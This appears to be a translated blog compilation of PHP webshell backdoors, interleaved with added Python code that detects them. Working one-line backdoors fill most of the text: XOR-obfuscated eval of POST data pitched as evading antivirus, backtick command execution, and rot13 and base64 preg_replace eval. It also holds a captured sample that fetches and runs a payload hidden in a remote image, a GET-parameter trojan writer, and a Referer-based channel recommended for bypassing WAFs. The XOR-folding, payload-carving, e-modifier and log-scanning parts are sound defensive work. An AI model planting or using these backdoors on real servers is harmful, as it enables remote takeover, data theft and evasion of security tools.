The most common one-line backdoor is usually written like this:
<?php @eval($_POST['cmd']); ?>
Or like this:
<?php @assert($_POST['cmd']); ?>
Tudouya posted [a construction trick] on FreeBuf that builds the same call like this:
<?php
@$_++; // $_ = 1
$__ = ("#" ^ "|"); // $__ = _
$__ .= ("." ^ "~"); // _P
$__ .= ("/" ^ "`"); // _PO
$__ .= ("|" ^ "/"); // _POS
$__ .= ("{" ^ "/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>
Built step by step like that, the construction is too easy to read, so it can also be written like this:
<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]); ?>
Pad it with some ordinary-looking code as camouflage, and a simple shell sample that evades antivirus signatures appears.
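For an analyst, the same XOR arithmetic can be undone statically. The Python below is an added example, not code from the original page; the helper names, the watch list and the simplified literal grammar are assumptions. It folds literal XOR and concatenation and reports sensitive names that appear only after folding.

```python
import re

# Two adjacent PHP string literals joined by an operator. Simplification:
# literals containing quotes or backslash escapes are left untouched.
PAIR = r"""(["'])([^"'\\]*)\1\s*%s\s*(["'])([^"'\\]*)\3"""
XOR_PAREN = re.compile(r"\(\s*" + PAIR % r"\^" + r"\s*\)")
XOR_BARE = re.compile(PAIR % r"\^")
CONCAT = re.compile(PAIR % r"\.")
# Names that have no reason to be assembled at run time (hypothetical watch list).
WATCH = re.compile(
    r"""["'](_(?:GET|POST|REQUEST|COOKIE|SERVER)|eval|assert|system)["']""", re.I)

def _xor(m):
    # PHP XORs strings byte by byte and truncates to the shorter operand.
    out = "".join(chr(ord(a) ^ ord(b)) for a, b in zip(m.group(2), m.group(4)))
    ok = out.isprintable() and not set(out) & set("\"'\\")
    return '"%s"' % out if ok else m.group(0)

def fold_literals(src):
    """Evaluate literal XOR and concatenation until the source stops changing."""
    prev = None
    while prev != src:
        prev = src
        src = XOR_PAREN.sub(_xor, src)
        src = XOR_BARE.sub(_xor, src)
        src = CONCAT.sub(lambda m: '"%s%s"' % (m.group(2), m.group(4)), src)
    return src

def hidden_names(src):
    """Sensitive identifiers that are visible only after folding."""
    folded = fold_literals(src)
    return sorted({m.group(1) for m in WATCH.finditer(folded)}
                  - {m.group(1) for m in WATCH.finditer(src)})

# Constructed input: only the string-building statement of the compressed sample.
SAMPLE = '$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");'

if __name__ == "__main__":
    print(fold_literals(SAMPLE))
    print(hidden_names(SAMPLE))
```

Running signature rules over the folded text instead of the raw file is what makes this kind of construction visible to a scanner.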
Next, one of the simplest PHP backdoors in history.
Straight to the code:
<?php
$c = urldecode($_GET['c']); if ($c) { `$c`; } // full form
!$_GET['c'] || `{$_GET['c']}`; // compact form
/*******************************************************
* Principle: PHP executes whatever is enclosed in backticks as a system command
* Example: http://host/?c=type%20config.php>config.txt
* then you can download config.txt and view its contents!
* You can try nastier commands, but don't do bad things!
*******************************************************/
The principle is that PHP passes whatever is enclosed in backticks (`, note: not single quotes) straight to the system shell for execution. That leaves plenty of room for variations.
Here is another equally simple piece of code:
<?php
preg_replace("/[errorpage]/e", @str_rot13('@nffreg($_CBFG[cntr]);'), "Saft");
?>
The password is page.
We recently captured a PHP webshell sample. Its clever dynamic code generation and its sneaky page-camouflage techniques made analyzing it a lot of fun. Let's go through this webshell together.
The webshell code is as follows:
<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");
if (empty($_SESSION['api']))
    $_SESSION['api'] = substr(file_get_contents(
        sprintf('%s?%s', pack("H*",
        '687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'), uniqid())), 3649);
@preg_replace("~(.*)~ies", gzuncompress($_SESSION['api']), null);
?>
The key is the following expression:
sprintf('%s?%s', pack("H*", '687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'), uniqid())
When evaluated, it yields the address of an image. The decoded image address is:
http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85
The sample then calls file_get_contents to read the image as a string, uses substr to take the content after the first 3649 bytes, and calls gzuncompress to decompress it, which yields the real code. Finally, preg_replace with the e modifier executes the malicious code. Running the following statement recovers the malicious sample code:
<?php
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s', pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'), uniqid())), 3649));
?>
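The same recovery can be done offline without running any PHP or contacting the remote host. The Python below is an added example, not code from the original page; the function names and the constructed stand-in carrier are assumptions. It goes beyond the fixed 3649-byte offset by also locating embedded zlib streams when the offset is unknown.

```python
import re
import zlib

# Hex string handed to pack("H*", ...), the encoding used for the URL above.
HEX_ARG = re.compile(
    r"""pack\s*\(\s*["']H\*["']\s*,\s*["']((?:[0-9a-f]{2})+)["']""", re.I)

def hidden_strings(php_src):
    """Decode pack("H*", '<hex>') arguments without executing the PHP."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_ARG.findall(php_src)]

def carve_payload(carrier, offset=3649):
    """Mirror substr($data, 3649) + gzuncompress(): skip the image, inflate the rest."""
    try:
        return zlib.decompress(carrier[offset:])
    except zlib.error:
        return None

def zlib_offsets(blob):
    """Find embedded zlib streams when the offset is not known in advance."""
    found = []
    for i in range(len(blob) - 1):
        # zlib header: method 8 (deflate) in the low nibble of byte 0, and the
        # two header bytes read as a big-endian number divisible by 31.
        if blob[i] & 0x0F == 8 and (blob[i] << 8 | blob[i + 1]) % 31 == 0:
            try:
                zlib.decompress(blob[i:])
                found.append(i)
            except zlib.error:
                pass
    return found

# Constructed inputs: the pack() call from the sample, and a stand-in carrier
# made of a JPEG magic number, padding up to 3649 bytes and a harmless payload.
SAMPLE_PHP = """sprintf('%s?%s', pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'), uniqid())"""
PAYLOAD = b"/* constructed placeholder, not the real second stage */"
CARRIER = b"\xff\xd8\xff\xe0" + bytes(3645) + zlib.compress(PAYLOAD)

if __name__ == "__main__":
    print(hidden_strings(SAMPLE_PHP))
    print(zlib_offsets(CARRIER), carve_payload(CARRIER))
```

An image file on a web server that contains a valid zlib stream after its image data is worth a closer look in its own right.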
A hidden PHP one-liner with no signature:
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode'] && preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))', 'a');
?>
This assigns the contents of $_POST['code'] to $_SESSION['theCode'] and then executes $_SESSION['theCode']. The highlight is that there is no signature: checking the code with a scanning tool raises no alarm, which achieves the goal.
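The three preg_replace samples above all depend on the e pattern modifier, which PHP deprecated in 5.5 and removed in 7.0, so flagging it is a cheap check on legacy code bases. The Python below is an added example, not code from the original page; the function names and the constructed sample calls (with placeholder arguments) are assumptions. It unescapes the pattern literal first, so the quote-delimited pattern of the last sample is handled too.

```python
import re

# preg_replace( followed by a quoted pattern literal; a pattern held in a
# variable is not resolved here.
CALL = re.compile(r"""preg_replace\s*\(\s*(["'])((?:\\.|(?!\1).)*)\1""", re.I | re.S)
BRACKETS = {"(": ")", "[": "]", "{": "}", "<": ">"}

def pcre_modifiers(pattern):
    """Return the modifier letters after the closing delimiter of a PCRE pattern."""
    pattern = pattern.lstrip()
    if not pattern:
        return ""
    closing = BRACKETS.get(pattern[0], pattern[0])
    end = pattern.rfind(closing)
    tail = pattern[end + 1:] if end > 0 else ""
    return tail if tail.isalpha() else ""

def eval_modifier_calls(src):
    """List (line, pattern, modifiers) for preg_replace calls whose pattern uses e."""
    hits = []
    for m in CALL.finditer(src):
        quote, raw = m.group(1), m.group(2)
        # Undo PHP string escaping of the quote and backslash, so that
        # '\'a\'eis' becomes 'a'eis: delimiter ', pattern a, modifiers eis.
        literal = re.sub(r"\\([\\%s])" % quote, r"\1", raw)
        mods = pcre_modifiers(literal)
        if "e" in mods:
            hits.append((src.count("\n", 0, m.start()) + 1, literal, mods))
    return hits

# Constructed input: the three pattern literals from this page with placeholder
# arguments, plus one harmless call that must not be flagged.
SAMPLE = r'''<?php
preg_replace("/[errorpage]/e", $replacement, "Saft");
preg_replace("~(.*)~ies", $stage2, null);
preg_replace('\'a\'eis', $expr, 'a');
preg_replace("/\s+/", " ", $title);
'''

if __name__ == "__main__":
    for hit in eval_modifier_calls(SAMPLE):
        print(hit)
```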
A super-hidden PHP backdoor:
<?php $_GET[a]($_GET[b]); ?>
The trojan is built from nothing but GET parameters.
Usage:
? a=assert&b=${fputs%28fopen%28base64_decode%28yy5waha%29,w%29,base64_decode% 28pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x%29%29};
After execution, a one-line trojan c.php is generated in the current directory. When the a parameter is eval, an error is raised and the trojan is not generated. With assert the same error is raised, but the trojan is still generated. This really should not be underestimated: a simple one-liner can be stretched to uses like this.
A layered-request PHP backdoor that runs encoded code:
This method is implemented with two files. File 1:
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '10' && count($a) == 9) {
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>
File 2:
<?php
//2.php
header('Content-type:text/html;charset=utf-8');
// The code to execute
$code = <<<CODE
phpinfo();
CODE;
// Base64 encoding
$code = base64_encode($code);
// Construct the Referer string
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
// Backdoor URL
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
?>
The base64-encoded code is carried in the HTTP_REFERER of the HTTP request to achieve the backdoor effect. WAFs generally inspect the Referer more loosely, or do not inspect it at all, so this idea works well for bypassing a WAF.
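Because the Referer ends up in the web server's access log, this channel can be hunted for after the fact. The Python below is an added example, not code from the original page; the log format (Combined Log Format), the function names, the code heuristic and the constructed log lines are assumptions. It decodes base64 found in Referer query values the way 1.php reassembles it and flags values that decode to code-like text.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl

# Combined Log Format: ip - - [time] "request" status bytes "referer" "agent"
LOG = re.compile(r'^(\S+) .*?"(?:\S+) (\S+)[^"]*" \d{3} \S+ "([^"]*)"')
# Heuristic (assumption): a call expression followed by a semicolon.
CODE_HINT = re.compile(rb"[A-Za-z_]\w*\s*\(.*\)\s*;", re.S)

def referer_payload(referer):
    """Return decoded bytes if Referer query values hide base64-encoded code."""
    query = referer.split("?", 1)[-1]
    values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
    # Each value alone, and every tail joined as implode(array_slice(...)) would.
    candidates = values + ["".join(values[i:]) for i in range(len(values))]
    for cand in candidates:
        cand = cand.replace(" ", "+")  # '+' arrives as a space after URL decoding
        if len(cand) < 8 or len(cand) % 4:
            continue
        try:
            raw = base64.b64decode(cand, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw.isascii() and CODE_HINT.search(raw):
            return raw
    return None

def scan(lines):
    """Return (client, path, decoded Referer payload) for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG.match(line)
        if m and (code := referer_payload(m.group(3))):
            hits.append((m.group(1), m.group(2), code.decode("latin-1")))
    return hits

ENC = base64.b64encode(b"phpinfo();").decode()  # same test code as 2.php above
SAMPLE_LOG = [  # constructed log lines
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /test1/1.php HTTP/1.1" 200 512 '
    f'"a=10&b=ab&c=34&d=re&e=32&f=km&g={ENC}&h=&i=" "curl/8.0"',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 '
    '"https://www.example.com/search?q=webshell+detection&page=2" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```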
We should approach these PHP backdoor programs with a learning mindset. A lot of PHP backdoor code shows us just how much thought programmers put into it.